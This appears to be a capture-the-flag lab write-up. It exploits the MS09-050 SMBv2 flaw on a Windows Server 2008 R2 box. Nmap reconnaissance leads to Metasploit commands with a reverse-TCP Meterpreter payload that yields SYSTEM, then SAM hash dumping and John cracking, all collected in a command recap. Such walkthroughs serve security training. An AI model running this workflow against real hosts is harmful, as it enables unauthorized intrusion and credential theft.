0x00 Exploiting Legacy SMB: MS09-050

Forgotten Windows Server 2008 R2 hosts remain a goldmine for attackers. This walkthrough shows how a single unpatched SMBv2 flaw—MS09-050, a remote-code-execution vulnerability first patched in 2009—can still deliver full SYSTEM access today.

Internal is a reminder that patch hygiene still decides who wins.
The target is a Windows Server 2008 R2 host running exposed SMB services and carrying a decade-old remote-code-execution flaw that remains exploitable in 2025.

No lateral pivots or obscure race conditions; just disciplined reconnaissance, quick vulnerability confirmation, and a clean exploit path.

Sidebar: MS09-050 is a buffer overflow in SMBv2 negotiation. Patched in 2009, it once caused global outages. Training platforms preserve them to teach fundamentals.

0x01 Initial Enumeration

Wide Nmap Scan

Always start with full coverage to avoid blind spots:

nmap -sC -sV --open <target_IP>

Results:

53/tcp    open  domain        Microsoft DNS
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2008 R2 SP1
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5357/tcp  open  httpapi       Microsoft HTTPAPI httpd 2.0
49152-49158/tcp open  msrpc

The standout is 139/445 (SMB) on an unpatched Server 2008 host. Classic exploit territory.

SMB Recon

Quick share checks:

smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>

No anonymous shares appeared, but that doesn’t mean SMB is safe.

Vulnerability Probe

nmap --script smb-vuln* -p 445 <target_IP>

Finding:

VULNERABLE:
MS09-050: SMBv2 Remote Code Execution
State: VULNERABLE

Confirmed CVE-2009-3103 in the wild.

Sidebar: Why SMB Stays High-Value:
• Requires little or no authentication to weaponize.
• Frequently exposed to the internet.
• Historic attack vector for Conficker (MS08-067), EternalBlue/WannaCry (MS17-010), and more.
Enumeration priority: always give SMB the first pass when you see it.

0x02 Exploitation — MS09-050 → SYSTEM

With MS09-050 confirmed, exploitation is almost point-and-shoot.
This SMBv2 buffer overflow gives immediate unauthenticated code execution—no credentials, no privilege escalation.

Metasploit Execution

msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <your_VPN_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
run

First attempt failed; no session. Root cause: incorrect LHOST.
Reverse shells need to point back to the correct interface, which in most lab setups is the VPN tunnel.

ip a | grep tun0

After updating LHOST to the tun0 address:

[*] Started reverse TCP handler on <tun0_IP>:9999 
[*] Meterpreter session 1 opened

Privilege check:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Full SYSTEM rights on first connection.

Sidebar: LHOST Discipline
• Local IP (192.168.x.x) works only for LAN targets.
• VPN IP (tun0/tun1) is required for lab/VPN targets.
• Public IP is needed for direct internet attacks.
Wrong setting = endless “no session” troubleshooting. Always verify the interface before firing a payload.

0x03 Post-Exploitation — Hashdump & Cracking

A SYSTEM shell is powerful, but stopping there leaves intelligence untapped.
In real operations, persistence and lateral movement require credentials.

Dump the SAM

meterpreter > hashdump

Sample output:

aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966

Crack with John

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Recovered credentials:

aaron : blue
jack  : aaa
niky  : niky

Weak, but valid.

Sidebar: Go Beyond the Shell
SYSTEM access proves the exploit.
Cracked credentials prove the business risk; exactly what stakeholders care about.

0x04 Debrief

Internal illustrates a recurring truth: legacy systems create long-term risk even when the vulnerability is more than a decade old.
The attack path stayed clean and predictable:

1. Recon exposed SMB on a Windows Server 2008 R2 target.

2. Nmap vuln scripts confirmed MS09-050.

3. Metasploit delivered a Meterpreter shell with full SYSTEM privileges.

4. Post-exploitation recovered user hashes and cracked valid credentials.

Key takeaways

• Old CVEs linger. Business-critical servers are often excluded from patch cycles or forgotten in dark corners of an enterprise network.

• Correct setup matters. Proper LHOST/interface selection is the difference between a one-minute exploit and hours of failed sessions.

• Post-exploitation adds value. Showing cracked credentials moves the finding from “lab exercise” to “real network compromise.”

Sidebar: Confidence Builders
These “fundamentals” boxes sharpen reflexes. Fast SMB recognition, quick vuln confirmation, and disciplined post-ex steps translate directly to real-world pentests and bug bounty targets. Legacy servers are still exposed in production—practice on them and you’ll recognize the same patterns when the stakes are higher.

0x05 Command Recap

For quick reference, the exact workflow:

# Recon
nmap -sC -sV --open <target_IP>
smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>
nmap --script smb-vuln* -p 445 <target_IP>

# Exploitation (MS09-050)
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <tun0_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
run

# Proof of Compromise
meterpreter > getuid
meterpreter > search -f proof.txt
meterpreter > cat C:\Users\Administrator\Desktop\proof.txt

# Post-Exploitation
hashdump
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt